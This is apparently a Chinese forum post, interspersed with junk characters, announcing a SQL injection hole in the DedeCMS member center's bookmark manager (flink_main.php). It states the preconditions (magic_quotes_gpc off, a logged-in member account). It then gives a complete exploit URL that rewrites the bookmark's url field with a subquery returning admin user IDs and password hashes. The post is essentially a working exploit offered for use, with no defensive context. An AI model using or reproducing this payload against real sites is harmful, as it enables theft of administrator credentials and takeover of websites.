DedeCMS会员中心SQL注射漏洞
( ]$ \2 U' ~' d) m, {/ r; v4 R需要magic_quotes_gpc = Off
2 m& o& a7 A$ _9 I* u# Y- }% q会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
; A" _! x: K: \8 n3 p / Q9 t6 b2 r4 w# Z, J* R. G
DedeCMS会员中心书签管理SQL注射漏洞1 {- {* J9 m: d. d$ A5 W1 C9 r
成功利用该漏洞可获得管理员密码$ _, _1 r3 F4 Z& {
8 z, H' ~8 |2 N' ~
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码( |$ a' K" x$ S2 p
3 C; g9 s6 l. ehttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r6 R; }/ U% P: L* `, f
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59